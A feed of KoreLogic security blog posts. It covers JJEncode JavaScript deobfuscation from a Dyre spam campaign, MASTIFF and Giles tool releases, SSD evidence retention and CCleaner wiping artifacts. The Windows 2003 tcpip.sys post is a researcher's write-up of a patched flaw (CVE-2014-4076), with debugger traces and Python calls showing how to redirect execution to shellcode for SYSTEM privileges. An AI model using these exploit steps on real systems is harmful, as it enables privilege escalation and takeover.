Quantcast
Channel: KoreBlog
Viewing all 78 articles
Browse latest View live

Brain Bleeding JavaScript Obfuscation

$
0
0

JavaScript is often used to facilitate web-based attacks. To make analysis more difficult and hide from signature-based systems, attackers will often obfuscate their JavaScript. Fortunately, there are many ways to deobfuscate JavaScript, or at least determine what it is doing. Sometimes, however, you come across obfuscated JavaScript that just makes your brain bleed.

UPDATE: Some have requested the actual JS used in this analysis, so here it is:

In the last few days there has been a Dyre (banking trojan) spam campaign with the subject lines "Fax #123456" or "Employee Documents - Internal Use". The emails contain a link to a web page that loads two obfuscated JavaScript pages - each of which look like this:

If there ever was obfuscated JavaScript that made you want to crawl under your desk and cry, this is it.

A common methodology to deobfuscate malicious JavaScript (JS) is to run it in a modified interpreter, such as the SpiderMonkey modified by Didier Stevens. These programs run the obfuscated JavaScript and give you output from JS eval or document.write commands, which is often used in obfuscated JavaScript.

Unfortunately, there are times these programs don't work. When that happens, if you want to see the deobfuscated code you have to do some manual analysis. This post will illustrate how to manually decode the JavaScript from this attack.

JJEncode

This obfuscated JavaScript is encoded using JJEncode, a JavaScript encoder. Unfortunately, I did not realize this until halfway through manual decoding. There is an excellent paper on how JJEncode works by Peter Ferrie, and two automated deobfuscation tools by Jacob Soo and Nahuel Riva. Any duplication of information from these resources is accidental.

Despite the availability of these resources, it is still worth examining how the JJEncoded JavaScript can be manually decoded so you can use these techniques in future deobfuscation attempts.

The Obfuscated Code

This JavaScript hurts to look at - mostly due to the lack of line breaks and the obfuscated variable names. However, if we examine the code one line at a time, we will start to get an idea of what it is doing. Code beautifiers, like JS Nice, work great for inserting line breaks automatically. Doing so with the obfuscated JavaScript shows that we are dealing with only 6 lines of code.

As we shall see during the analysis, JJEncode is essentially a substitution encoding that goes through three phases:

  • Initialization, where characters and values are assigned to variables.
  • Substitution, where the variables are used to construct code.
  • Execution, where the constructed code is executed.

As each line is analyzed, we will see these phases and construct the deobfuscated code.

Line 1

The first line consists of:

$ = ~[];

JavaScript variable names are pretty flexible in the characters that can be used, so the above variable name of "$" is a valid name. Unlike a number of other languages, such as Perl, the dollar sign is not a reserved character and therefore able to be used in any part of the variable name. This allows other variables names that we'll see in this JS, such as $_, $$$, and _$_.

Line 1 is an assignment statement, assigning the value of ~[] to the variable $. The tilde character is a bitwise NOT operation, and the [] signifies a JavaScript array. What happens when you NOT an array? You get -1.

So, this statement assigns -1 to the variable $.

Line 2

The second line is a bit longer, but broken up we see:

$ = {
  ___ : ++$,
  $$$$ : (![] + "")[$],
  __$ : ++$,
  $_$_ : (![] + "")[$],
  _$_ : ++$,
  $_$$ : ({} + "")[$],
  $$_$ : ($[$] + "")[$],
  _$$ : ++$,
  $$$_ : (!"" + "")[$],
  $__ : ++$,
  $_$ : ++$,
  $$__ : ({} + "")[$],
  $$_ : ++$,
  $$$ : ++$,
  $___ : ++$,
  $__$ : ++$
};

In this line, $ is being reassigned to a JavaScript object, as denoted by the curly braces. Properties of the object are defined within the braces in the form "name : value", and individual properties are separated by commas.

The first property is ___ (3 underscores), or its full name, $.___. The value of this property is ++$, which takes the value of $ (currently -1), increments it (to 0), and then assigns it to the property. So, in this statement, $ is incremented by one to 0 and then assigned to $.___. Note that since the object is still being built, $ is still a number and not an object yet.

The second property is $$$$. The value of this property is (![] + "")[$].

The first part of this value is (![] + ""). ![] is an array that is logically NOT'd. This turns it into the boolean value "false". By concatenating it with an empty string, the value is turned a string. Therefore, (![] + "") evaluates to the string "false".

However, there is a [$] after the string "false". In JavaScript, a letter of a string can 1 be obtained by specifying the index of the character within brackets (string positions start at 0). Here, $ currently evaluates to 0, so this line is asking for the character at position 0 in the string "false", or "f".

Iterations for the explanation above are shown below to better illustrate the process.

$$$$ : (![] + "")[$]
1. $$$$ : (false + "")[$]
2. $$$$ : ("false")[$]
3. $$$$ : ("false")[0]
4. $$$$ : "f"

The rest of the object properties are constructed in a similar fashion: incrementing the $ variable, constructing a string, and grabbing a character out of the string by specifying its index.

After decoding all of the object, the values look as such:

$ = {
  ___  : 0,
  $$$$ : "f",
  __$  : 1,
  $_$_ : "a",
  _$_  : 2,
  $_$$ : "b",
  $$_$ : "d",
  _$$  : 3,
  $$$_ : "e",
  $__  : 4,
  $_$  : 5,
  $$__ : "c",
  $$_  : 6,
  $$$  : 7,
  $___ : 8,
  $__$ : 9
};

What do we have? The hexadecimal alphabet! The purpose of this whole statement was to produce the hexadecimal alphabet for use in the later substitutions.

Line 3

The next three lines construct more variables used for substition. Line 3 (separated to easily view) is:

$.$_=($.$_=$+"")[5]+
     ($._$=$.$_[1])+
     ($.$$=($.$+"")[1])+
     ((!$)+"")[3]+
     ($.__=$.$_[6])+
     ($.$=(!""+"")[1])+
     ($._=(!""+"")[2])+
     $.$_[5]+
     $.__+
     $._$+
     $.$;

This is an assignment to a new property in the $ object, $.$_. The value of the property is constructed by concatenating values together, as denoted by the plus operator. Each value is grabbing a character using an index, so this is likely a string being constructed. We can evaluate each of the values to get the entire string.

  1. The first character is ($.$_=$+"")[5]. This operation assigns the value of $+"" to $.$_, then takes the 6th character (index 5 is the 6th character). $+"" is the string "[object Object]", and the 6th character is "c".

  2. The second character is ($._$=$.$_[1]). $.$_ was previously assigned the value of "[object Object]", so the 2nd character (index 1) is "o". Note this also assigns "o" to $._$.

  3. Third, we have ($.$$=($.$+"")[1]) which assigns a value to $.$$. The value assigned is ($.$+"")[1]. $.$ has not been seen yet, so it is undefined, thus creating the string "undefined". The second letter is "n", so "n" is assigned to $.$$.

  4. Fourth is ((!$)+"")[3]. This obtains the 4th letter of the string created by ((!$)+""). Performing a boolean NOT (the '!' operator) on an object returns false, so the string "false" is created. The fourth letter is "s".

  5. ($.__=$.$_[6]) is the fifth operation, which assigns the 7th letter of $.$_ (the string "[object Object]") to $.__. The 7th letter is "t".

  6. Sixth, ($.$=(!""+"")[1]) assigns a value to $.$. The value assigned is the 2nd letter of !""+"". In JavaScript, an empty string is considered another representation of false, so a logical NOT of false is the value true. The operaton !""+"" creates the string "true", the 2nd letter of which is "r".

  7. The seventh operation, ($._=(!""+"")[2]), gets the 3rd character from the same string ("true"), "u", and assigns it to $._.

  8. Eigth, the 6th character of $.$_ ("[object Object]") is obtained, "c".

  9. The last three characters are composed of object properties that have already been assigned values: $.__, $._$, and $.$. These values are "t", "o", and "r", respectively.

In the end, this line of code creates the string "constructor" and assigns it to $.$_.

Line 4

Lines 4 and 5 construct two strings in a similar fashion.

Line 4's string is constructed through the code:

$.$$=$.$+
     (!""+"")[3]+
     $.__+
     $._+
     $.$+
     $.$$;

Most of the characters in the string use previously assigned values that we can substitute in, giving us:

$.$$="r"+(!""+"")[3]+"t"+"u"+"r"+"n"

The only letter not substitued is constructed through (!""+"")[3]. This is the operation that returns the string "true", the fourth character of which is "e". So, this line creates the string "return".

Line 5

The last string constructed is on line 5:

$.$=(0)[$.$_][$.$_];

$.$_ is equal to the word "constructor", so we have the operation (0)[constructor][constructor]. Typing that into a JavaScript interpreter returns the following function:

function Function() { [native code] }

This is creating a JavaScript function definition. Since this was not passed any data, the function itself is empty. However, if we were to pass a string of JavaScript code into it, as shown in the example below, we would create an anonymous JavaScript function:

js> (0)["constructor"]["constructor"]("alert ('hi!');")
function anonymous() {
    alert("hi!");
}

For the purposes of our decoding, this statement is creating a function and we can substitute the function keyword when we see $.$ later in the obfuscated JavaScript.

For those keeping track, our $ object now has the following values:

$ {
  ___  : 0,
  $$$$ : "f",
  __$  : 1,
  $_$_ : "a",
  _$_  : 2,
  $_$$ : "b",
  $$_$ : "d",
  _$$  : 3,
  $$$_ : "e",
  $__  : 4,
  $_$  : 5,
  $$__ : "c",
  $$_  : 6,
  $$$  : 7,
  $___ : 8,
  $__$ : 9,
  $_   : "constructor",
  _$   : "o",
  $$   : "n",
  __   : "t",
  _    : "u",
  $$   : "return",
   $  : function
}

Line 6

At this point we have performed all of the data initialization. Line 6 is where the substition and execution of the deobfuscated code occurs. This happens simultaneously in the JavaScript code, but we can seperate it out to view what is occurring. By substituting in the values we know about, we get a clearer picture of what the code is doing.

Note that you have to be careful when doing this, as a simple search and replace cannot be performed as you run the risk of substituting incorrect values. Performing the substitution is left as an exercise to the reader, but when done you will get the following code.

As seen above, the line 6 creates an anonymous function that is executed. The function's code is created by substituting values that were constructed earlier in the JavaScript. Since this code is currently a string of concatenations, we can bring the string together to be a bit more readable.

The code still isn't entirely clear, but it is much better than before.

A number of characters in the obfuscated code above are in the format backslash followed by a number. In JavaScript, this is the format used to represent a character by its octal (base 8) value.

The octal values can be replaced with their ASCII equivalents to remove this level of obfuscation. This leaves us with the unobfuscated code that is executed within the anonymous function.

Conclusion

The JJEncoded JavaScript looks daunting (and brain bleeding) at first. The obfuscation makes use of non-standard and repetitive variable names, and strings constructed in odd methods to fool analysts into thinking that it is much harder to deobfuscate than it actually is. However, by moving slowly and taking the code one line at a time, we can remove the obfuscation to get at the actual code beneath.

While there are automatic decoders for JJEncode available, the next obfuscation technique you come across might not have a decoder. Tools help, but they only get so far and won't work all the time so being able to perform deobfuscation manually is a skill worth having.

Notes

1. Interesting to note, using indexes to obtain string characters was not always a standard JavaScript feature, and therefore may not work in older browsers.

Giles 3.0.0 Released

$
0
0

The Giles production rule system compiler has just been released! It is available for download here.

Production rule systems (or "engines" in Giles parlance) are tools that are commonly used to efficiently find patterns in streams of data where any number of data items (or "facts") can be added or removed over time. They're very commonly used to perform complex behavior detection (i.e., event correlation), like fraud detection for credit cards via transaction history or multi-part attacks against servers via combined analysis of firewall and server logs. They can also be used to provide some form of artificial intelligence, forming the core of many expert systems and automated planners.

All that sounds great, but what is Giles?

Well, first off, let me explain the motivation behind Giles. Traditionally, production rule systems are either standalone, or complex packages with APIs accessible from only a handful of languages. We wanted to build a new breed of compiler that lets users create engines that are accessible from any programming language and easily embedded inside larger projects. To that end, we created Giles.

Giles's claim to fame is that it can turn a normal relational database (SQLite in the current release) into a production rule system (engine). It does this by compiling a description of the engine into a database schema. Databases created using this schema instantly become the described engine, with no additional software or driver program needed.

This approach has immediate advantages, the most important being that any language that can access the database can be used to access and drive the engine. This makes it much easier to embed complex event correlation, artificial intelligence, and automated planning inside larger applications. Another interesting benefit is that these production systems can take advantage of the underlying database's data-safety guarantees (e.g., transactions, data durability, etc.). Finally, these production systems can handle terabytes of data, survive system crashes, and be run over long periods of time.

Production rule systems are often considered esoteric or hard to understand or use. But don't let that hold you back. One of our goals is to make these powerful computational tools more accessible to a wider audience. The distribution tar ball includes several examples that you can experiment with.

In conclusion, I hope all this sounds interesting to you. If it does, please download Giles, read the documentation, and give the examples a try. Also, stay tuned to the KoreLogic Blog where we will post various worked examples, tips, and tricks in the days ahead.

Windows 2003 Privilege Escalation via tcpip.sys

$
0
0

In my post for today, I will be discussing a vulnerability that I found within the TCP/IP driver as implemented by Microsoft within their Windows 2003 Operating System with Service Pack 2 installed (advisory here). If an attacker has obtained unprivileged access into the operating system, this vulnerability may be used to elevate their privilege to that of SYSTEM. This is accomplished by abusing a null near pointer dereference within code that runs during the processing of a specific unprivileged IOCTL call.

This vulnerability was issued identifiers: KL-001-2015-001, MS14-070, and CVE-2014-4076.

In order to avoid duplicating content from the advisory issued for this vulnerability, I will only provide a brief tl;dr before diving into the exploit.

By using nt!NtDeviceIoControlFile() it is possible to leverage a handle into the Tcp device along with the IOCTL code 0x00120028 and specific inputBuffer to trigger a near null pointer dereference within the extended stack index register. This register is used as a pointer to memory containing a dword that is used to determine the code path to be taken. This can be abused through a combination of reverse engineering (in order to understand what values have what effect on code flow) and attacker memory allocation near null.

In this post, I will discuss in detail the methodology leveraged during exploit development. I would like to note that Microsoft has confirmed this vulnerability exists on both x86, x64, and Itanium architectures. I will only focus on the x86 architecture in this post.

The original crash that led to the exploitation of this vulnerability was found as such:

ErrCode = 00000000
eax=00000000 ebx=859ef888 ecx=00000008 edx=00000100 esi=00000000 edi=80a58270
eip=f67ebbbd esp=f620a9c8 ebp=f620a9dc iopl=0         nv up ei pl zr na pe nc
cs=0008  ss=0010  ds=0023  es=0023  fs=0030  gs=0000             efl=00010246
tcpip!SetAddrOptions+0x1d:
f67ebbbd 8b5e28          mov     ebx,dword ptr [esi+28h] ds:0023:00000028=????????

The ???????? indicates that the memory being reference is not allocated and therefore can not be copied from. The ESI register contains 0x00000000, a value that is user-controlled during the IOCTL call. By modifying that value, it is possible for an attacker to control memory used during decisions by the driver relating to code flow. This allows an attacker to influence those decisions in a way that benefits him. Let's review some of what that looks like.

kd> p
tcpip!SetAddrOptions+0x2b:
ba9fca65 f6c340          test    bl,40h
kd> p
tcpip!SetAddrOptions+0x2e:
ba9fca68 7567            jne     tcpip!SetAddrOptions+0x9e (ba9fcad1)
kd> p
tcpip!SetAddrOptions+0x30:
ba9fca6a 66837e3800      cmp     word ptr [esi+38h],0
kd> p
tcpip!SetAddrOptions+0x35:
ba9fca6f 7560            jne     tcpip!SetAddrOptions+0x9e (ba9fcad1)
kd> r;p

The BL register contains the last byte in a dword value obtained from ESI+28, or 0x00000028. No problems there, we'll just write any four-byte value we like there. In my exploit, I ended up with the following:

ret_two = WriteProcessMemory(-1, 0x28, "\x87\xff\xff\x38", 4, byref(c_int(0)))

Only the first and last bytes are really needed to accomplish exploitation. I did not go any further to figure out the meaning of the inner two bytes.

The last byte is tested first using this instruction:

test bl, 40h

Basically, this becomes a bitwise AND (i.e., 0x38 & 0x40). The second test is then encountered. This test determines whether the word pointer at 0x00000038 is 0x0000 or not. Since this also falls within range of memory that I can write to, my exploit does the following:

ret_three = WriteProcessMemory(-1, 0x38, "\x00"*2, 2, byref(c_int(0)))

So far so good, this gets me to a code block that makes a call into tcpip!IsBlockingAOOption.

kd> p
tcpip!SetAddrOptions+0x37:
ba9fca71 ff75f8          push    dword ptr [ebp-8]    ss:0010:b9c5db78=00000200
kd> p
tcpip!SetAddrOptions+0x3a:
ba9fca74 ff750c          push    dword ptr [ebp+0Ch]  ss:0010:b9c5db8c=00000022
kd> p
tcpip!SetAddrOptions+0x3d:
ba9fca77 e8f588ffff      call    tcpip!IsBlockingAOOption (ba9f5371)
kd> p
tcpip!SetAddrOptions+03e:
ba9d4a7c 84c0            test    al,al

This code does a bitwise AND operation on the AL register. The value of the AL register is set as a result of the call to tcpip!IsBlockingAOOption. This code leverages the EAX register, which also becomes tainted with a null value earlier on in the code flow.

From here, we can release code flow until the instruction pointer is dereferenced.

eax=00000010 ebx=80a58290 ecx=00000000 edx=00000000 esi=00000000 edi=00000000
eip=baa07ee2 esp=b9b12b48 ebp=b9b12b60 iopl=0         nv up ei ng nz na pe cy
cs=0008  ss=0010  ds=0023  es=0023  fs=0030  gs=0000             efl=00000287
tcpip!ProcessAORequests+0x144:
baa07ee2 8b86ec000000    mov     eax,dword ptr [esi+0ECh] ds:0023:000000ec=00000000
kd> p
...
eax=00000000 ebx=80a58290 ecx=00000008 edx=00000000 esi=00000000 edi=00000000
eip=baa07ef3 esp=b9b12b48 ebp=b9b12b60 iopl=0         nv up ei pl nz na po nc
cs=0008  ss=0010  ds=0023  es=0023  fs=0030  gs=0000             efl=00000202
tcpip!ProcessAORequests+0x155:
baa07ef3 8945f4          mov     dword ptr [ebp-0Ch],eax ss:0010:b9b12b54=baa07da3
kd> p
...
kd> db [ebp-0c] L?0x4
b9b12b54  00 00 00 00                                      ....
kd> r;p
eax=00000000 ebx=80a58290 ecx=00000002 edx=00000000 esi=00000000 edi=00000000
eip=baa07efa esp=b9b12b40 ebp=b9b12b60 iopl=0         nv up ei pl zr na pe nc
cs=0008  ss=0010  ds=0023  es=0023  fs=0030  gs=0000             efl=00000246
tcpip!ProcessAORequests+0x15c:
baa07efa ff55f4          call    dword ptr [ebp-0Ch]  ss:0010:b9b12b54=00000000
Illegal instruction - code c000001d (!!! second chance !!!)
0000002a ff              ???

tl;dr

mov     eax,dword ptr [esi+0ECh] ds:0023:000000ec=00000000
mov     dword ptr [ebp-0Ch],eax ss:0010:b9b12b54=baa07da3
call    dword ptr [ebp-0Ch]  ss:0010:b9b12b54=00000000

Now, we need to get the pointer landing somewhere nice and put some fun shellcode to be executed.

ret_one = NtAllocateVirtualMemory(-1,byref(c_int(0x1000)),0x0,byref(c_int(0x1000)),0x1000|0x2000,0x40)
ret_five = WriteProcessMemory(-1, 0x2b, "\x00"*2, 2, byref(c_int(0)))
ret_six = WriteProcessMemory(-1, 0x2000, sc, len(sc), byref(c_int(0)))

Writing 0x0000 at 0x2b will change the EIP value to 0x2000, we can then have our shellcode waiting at 0x2000. An alternative to this, would be to write a dword pointer to your shellcode at 0x000000ec. Both cases act as a trampoline into the shellcode.

Then, an attacker only needs to issue the following call:

DeviceIoControlFile(handle,NULL,NULL,NULL,byref(c_ulong(8)),0x00120028,0x1100,len(buf),0x0,0x0)

A metasploit module to leverage this vulnerability has been released by another member of our team along with this blog post; pull request here. In the meantime, exploit code written in Python can be found in the advisory we published.

Cheers, Matt

SSD Storage - Ignorance of Technology is No Excuse

$
0
0

Digital evidence storage for legal matters is a common practice. As the use of Solid State Drives (SSD) in consumer and enterprise computers has increased, so too has the number of SSDs in storage increased. When most, if not all, of the drives in storage were mechanical, there was little chance of silent data corruption as long as the environment in the storage enclosure maintained reasonable thresholds. The same is not true for SSDs.

A stored SSD, without power, can start to lose data in as little as a single week on the shelf.

SSDs have a shelf life. They need consistent access to a power source in order for them to not lose data over time. There are a number of factors that influence the non-powered retention period that an SSD has before potential data loss. These factors include amount of use the drive has already experienced, the temperature of the storage environment, and the materials that comprise the memory chips in the drive.

The Joint Electron Device Engineering Council (JEDEC) defines standards for the microelectronics industry, including standards for SSDs. One of those standards is an endurance rating. One of the factors for this rating is that an SSD retains data with power off for the required time for its application class.

For client application SSDs, the powered-off retention period standard is one year while enterprise application SSDs have a powered-off retention period of three months. These retention periods can vary greatly depending on the temperature of the storage area that houses SSDs.

In a presentation by Alvin Cox on JEDEC's website titled "JEDEC SSD Specifications Explained" [PDF warning], graphs on slide 27 show that for every 5 degrees C (9 degrees F) rise in temperature where the SSD is stored, the retention period is approximately halved. For example, if a client application SSD is stored at 25 degrees C (77 degrees F) it should last about 2 years on the shelf under optimal conditions. If that temperature goes up 5 degrees C, the storage standard drops to 1 year.

The standards change dramatically when you consider JEDEC's standards for enterprise class drives. The storage standard for this class of drive at the same operating temperature as the consumer class drive drops from 2 years under optimal conditions to 20 weeks. Five degrees of temperature rise in the storage environment drops the data retention period to 10 weeks. Overall, JEDEC lists a 3-month period of data retention as the standard for enterprise class drives.

A check of various drive manufacturers, in this case Samsung, Intel, and Seagate, shows that their ratings for data retention of their consumer class drives are what would be expected for JEDEC's enterprise class drive standards. All three quote a nominal 3-month retention time period. Most likely, the manufacturers are being conservative; however, it demonstrates the potential variability the manufacturers associate with data retention on any SSD in storage.

When you receive a computer system for storage in legal hold, drive operating and ambient storage temperature are probably not the first things on tap to consider. You cannot control the materials that comprise the drive and the prior use of the drive. You can control the ambient temperature of the storage which will potentially aid in data retention. You can also ensure that power is supplied to the drives while in storage. More importantly, you can control how the actual data is retained.

The easiest way to manage the problem is to image the drive in a timely manner. If long term storage is required, image the SSD onto a mechanical drive and place that drive in storage as well as the SSD. If you maintain an online legal hold storage capability, image the SSD to that storage. Either way, you essentially eliminate potential data retention problems. The worst-case scenario is explaining to the court why your data cannot be accessed because the hard drive you placed into storage is throwing out errors.

What started this look into SSDs? An imaging job of a laptop SSD left in storage for well over the 3-month minimum retention period quoted by the manufacturer of the drive before it was turned over to us. This drive had a large number of bad sectors identified during the imaging period. Not knowing the history, I did not consider the possibility of data loss due to the drive being in storage. Later, I learned that the drive was functioning well when it had been placed into storage. When returned to its owner a couple of months after the imaging, the system would not even recognize the drive as a valid boot device. Fortunately, the user data and files were preserved in the drive image that had been taken, thus there was no net loss.

Now imagine a situation in which an SSD was stored in legal hold where the data was no longer available for imaging, much less use in court. Ignorance of the technology is no excuse, and I am sure the opposing counsel would enjoy the opportunity to let the court know of the "negligent" evidence handling in the matter.

Bottom line - image it now … and use a mechanical disk.

MASTIFF Online Free 1.0.0 Released

$
0
0

KoreLogic is pleased to announce the release of MASTIFF Online, a web interface into the open source MASTIFF static analysis framework. With this free online tool, anyone can upload files to be examined by MASTIFF, returning the results within minutes. MASTIFF Online can be accessed at https://mastiff-online.korelogic.com.

MASTIFF was created by KoreLogic through the DARPA Cyber Fast Track program. The purpose of MASTIFF is to provide an automated framework through which analysts can quickly run static analysis techniques, such as embedded strings and PE header analysis, against a potentially malicious file. Written in Python, MASTIFF is able to be quickly expanded to take on new types of files or add new analysis techniques. Unlike other malware analysis frameworks, MASTIFF focuses solely on static analysis (examining the characteristics of files), and not dynamic analysis (examining the behavior of files).

MASTIFF Online was created to meet the needs of users for a web interface to the framework. Using the KoreLogic Rapid Application Development (KRAD) service, KoreLogic was able to construct the web front-end in a short amount of time and push it out for public use.

Currently, MASTIFF Online supports a number of file types and utilizes a number of static analysis techniques, including:

  • PE Header Analysis
  • Embedded Strings Analysis
  • Single-byte String Extraction
  • PE Resource Analysis
  • Anti-virus Results based on hash
  • Malicious PDF Object Detection
  • Microsoft Office Shellcode Detection
  • ...and many others

MASTIFF Online can be accessed at https://mastiff-online.korelogic.com.

The source code for MASTIFF can be downloaded at https://git.korelogic.com/mastiff.git/.

The framework is a work in progress and new analysis types and techniques will be continually added. If you have any questions, comments, or suggestions for improvement, please contact the development team at mastiff-online@korelogic.com.

What Did CCleaner Wipe?

$
0
0

The use of CCleaner is encountered at times during forensic investigations of computer systems. It has been labeled an "anti-forensics" tool as it has a secure deletion mode where it can overwrite data, filenames, and free space.

Overwriting files and filenames removes the chance to recover the data and subject it to further analyses; hence, the anti-forensics label. There may be some remnants and data left for analysis and comparison; but, at best you can infer what had been wiped. What you are faced with is a case of "You don't know what you don't know".

That is, until now. CCleaner will actually tell you what files it wiped. You just have to work for it.

CCleaner is a system optimization software package developed and distributed by Piriform. A free version is available for download and use. Piriform describes the capabilities of CCleaner as follows:

"CCleaner is our system optimization, privacy and cleaning tool. It removes unused files from your system - allowing Windows to run faster and freeing up valuable hard disk space. It also cleans traces of your online activities such as your Internet history. Additionally it contains a fully featured registry cleaner. But the best part is that it's fast (normally taking less than a second to run) and contains NO Spyware or Adware!

CCleaner does have a few artifacts that may be uncovered. The character patterns of overwriting; registry values for the configuration settings; as well as the data still resident in pagefile, volume shadows, and hibernation files after its use have been reported on sites such as:

CCleaner, in what Piriform refers to as "secure file deletion" mode, overwrites a file's content with other characters. There are multiple options available in this mode with each option increasing the number of times a file is overwritten. Even the "simple overwrite" option consisting of one pass over the data is enough to frustrate recovery of the original data.

Filenames are overwritten as well. On an NTFS formatted drive, the filename records in the Master File Table are replaced with the letter "Z". For example, a file named "TEST.TXT" will have each character in the name overwritten with the letter Z and will be renamed to "ZZZZ.ZZZ" after the process is completed.

CCleaner, even on its most aggressive settings, will possibly leave some information in the pagefile, volume shadows, and hibernation files on a system. A forensics examiner could recover Internet History as well as other remnants from these areas as they have not been overwritten by CCleaner.

When trying to gather information on data overwritten by CCleaner, files resident in volume shadows will allow you to infer what may have been overwritten. The same is true for files and filenames located in pagefiles and hibernation files. The registry entries for CCleaner's configuration settings will indicate the types of files and some locations of files that will be affected, but does not directly tell you the names of the files, much less their content. The difficulty is in establishing a link between the data you believe CCleaner overwrote and the data actually overwritten by the program.

For example, in a recent case filenames and file paths recovered from a hibernation file showed a few thousand filenames referenced that were no longer resident on the system. Fortunately, the system had gone into hibernation shortly before the wiping so the timing was good, allowing for a comparison of filenames found in the hibernation file to filenames active on the system.

The configuration settings for CCleaner allowed one to infer that many of these files were potentially files wiped by CCleaner. However, deletion in the normal course of events for the system, such as when the Internet cache size has been exceeded, could not be entirely excluded.

To try to address the question of what CCleaner wiped, testing was performed on a clean system to observe and monitor how CCleaner operates. This testing uncovered an artifact of what appears to be how CCleaner handles the overwriting of filenames on a system. As stated previously, CCleaner will overwrite letters in a filename with the letter "Z". In the process of performing this task, CCleaner writes out the filename it intends to replace multiple times, followed by the same filename lengths, this time consisting of all Z's.

For example, as CCleaner was executing, the filename "TEST.TXT" was seen being written out to disk a few times, followed by the pattern "ZZZZ.ZZZ". The other filenames being overwritten were handled in the same fashion. A forensic image of the system was taken after the execution of CCleaner had completed and was searched for the pattern noticed in testing. A match of this pattern was found in the unallocated space of the hard drive.

The search results looked like this:

TEST.TXT
TEST.TXT
TEST.TXT
ZZZZ.ZZZ
ZZZZ.ZZZ
ZZZZ.ZZZ

TEST1.TXT
TEST1.TXT
TEST1.TXT
ZZZZZ.ZZZ
ZZZZZ.ZZZ
ZZZZZ.ZZZ

And so forth…

In order to ensure that the monitoring programs did not affect this finding, the same test was run again on a clean system without the monitoring tools in place. Once again, the pattern was located in the unallocated portion of the hard drive. Even after varying settings for CCleaner, positive findings for this pattern were located on the hard drive. Only when the free space overwriting option was selected did most of the artifacts go away. Some items were still found in the pagefile; however, these were quite few compared to the amount previously located.

The real test took place when a search for this pattern was conducted on the hard drive in the case mentioned previously. Success!

Positive hits were found on the drive and were quite extensive. In fact, of the few thousand filenames referenced in the hibernation file that were no longer resident on the system, over 80% matching filenames were located and associated with these CCleaner artifacts.

So, we had positive correlation of roughly 80% of the unique filenames found in the hibernation file impacted by CCleaner running on the system.

Once a filename is located, even if the original file is overwritten, it is still possible to gather more information regarding that file. Remnants and even whole copies of files may be located once a filename is identified. If you have a filename, searches for that name will turn up interesting and informative results.

In this case, finding this artifact in CCleaner led to the identification of multiple key elements. In every case since this one involving CCleaner, this pattern has allowed the correlation of at least some information about files that were wiped. Unfortunately, this search will not allow one to completely locate all of the filenames of files that were overwritten, or necessarily lead to recovering their data.

More information, including our timeline of attempts to contact the vendor, available in the advisory we published.

To quote the Rolling Stones song from the "Let It Bleed" album:

"You can't always get what you want. But if you try sometime, you find, you get what you need."

One Month of MASTIFF Online!

$
0
0

It has been exactly one month since MASTIFF Online was opened, and to celebrate, we have released the next stable version of MASTIFF! Version 0.7.1 includes a large number of bug fixes, as well as some new analysis plug-ins to get more information out of the files you are analyzing. The new version can be found at https://git.korelogic.com/mastiff.git/.

MASTIFF 0.7.1

Most of the code in this release has been in the git repository for some time now. Remember, you can always download the latest code to try out any new features and plug-ins that have been added.

What has changed since the last stable version of MASTIFF? A lot. Here is a brief list of major changes:

  • Tons of bug fixes.
  • Plug-ins have been moved to a central directory, so you no longer have to specify their location in the MASTIFF config file.
  • A hex dump analysis plug-in was added to render the file in hex output.
  • A Metascan Online plug-in was added to query the Metascan site. Note, however, that you will need an API key to query that site.
  • Yara signatures are now also used to determine file type in the category plug-ins.
  • When running setup.py to install MASTIFF, the configuration file will now be installed into /etc/mastiff so it is detected by default.

Expect more great things to come from MASTIFF in the near future, including output plug-ins!

MASTIFF Online

In the past month, we have seen a lot of activity surrounding MASTIFF Online. The response has been overwhelmingly positive, and we have received many submissions to the site. Even more important, the submission rate has been fairly steady, and we continue to analyze new malware each day.

Some statistics about our first month of operation:

  • At last check, we have received 526 files to analyze. The vast majority have been Windows PE executables, followed by PDFs and Office documents. However, we've also received a number of ELF executables. We are looking to expand the analysis offerings for all of these file types to make the site more useful.
  • The United States leads the number of uploads to the site, followed by Brazil and Spain.
  • MASTIFF Online has been visited by over 900 unique IP addresses since it opened. The U.S. leads this statistic as well, followed by Great Britain and Spain.

This may not seem like a lot of files or visits, but MASTIFF Online is still a new site and the fact that we are seeing a steady amount of traffic is a good indicator of its usefulness.

How to Contribute

As time goes on, we plan on adding more features to both MASTIFF and MASTIFF Online. However, to do so, we need feedback from the community. Let us know what you would like to see in the project. The more feedback we receive, the better we can prioritize the feature enhancements we are working on.

Send feedback or suggestions to mastiff-online@korelogic.com.

Don't forget that you can always write new plug-ins for MASTIFF and submit them to the git repository.

The WebJob Framework: An Endpoint Security Solution

$
0
0

The WebJob framework is a next generation endpoint security solution that, from a centralized management location, can execute virtually any program on an arbitrary number of end systems at any time. This framework has been deployed in a number of production environments including the Federal government and Fortune 500 businesses to perform various activities such as evidence collection, enterprise searches, incident response, live forensics, system management and monitoring, and grid computing.

The WebJob framework is an open source client-server solution that acts as a force multiplier for anyone who needs to automate various tasks or work on an enterprise scale. It does this by enabling engineers to run arbitrary programs and/or scripts on a wide array of operating systems (e.g., UNIX®, Linux®, Mac OS®, Windows®, Android®, etc.). The results, if any, can be aggregated and collated on the WebJob server where they can be operated on in bulk. With the flexibility that the framework provides, administrators who are inclined to write their own scripts can achive a high level of automation and efficiencies of scale. With the WebJob framework, you can effectively do more with less.

Please click the link below to read more about how the framework could be the next generation endpoint security solution for you.


The WebJob Framework: A Generic, Extensible, and Scalable Endpoint Security Solution

MASTIFF Online Updated to Add pyOLEScanner

$
0
0
The MASTIFF Online site was updated on 2015-06-05 which included the following:
  • Enabled pyOLEScanner version 1.2 tool as part of processing samples. pyOLEScanner is a python based script written by Giuseppe 'Evilcry' Bonfa and inspired from OfficeMalScanner. It scans office documents in order to assess if they could be malicious. Within MASTIFF Online the plugin is only executed for office document file types (a.k.a., "Office"), and the results of the plugin can be seen by clicking on the "office-analysis" record in the detail pane for those file types.
  • Added an "x" icon next to the GUI search box which clears the search box text and refreshes the list when clicked.
We will re-process samples when necessary (e.g., after a MASTIFF upgrade or plugin addition) and as time allows. In this case the existing samples have been re-processed so that they now have the new plugin results.

Giles at Black Hat and in the ISSA Journal

$
0
0

The Giles production rule system compiler (which we described here) has gotten some good press lately!

An article describing Giles and its use has been published in the June 2015 issue of The ISSA Journal, which can be seen by subscribers here. The ISSA Journal is the official journal of the Information Systems Security Association, and we're very proud to have an opportunity to discuss Giles on its pages. The article describes what Giles is, how to use it, and how to use the engines it creates. It also talks a little bit about how it works under the hood.

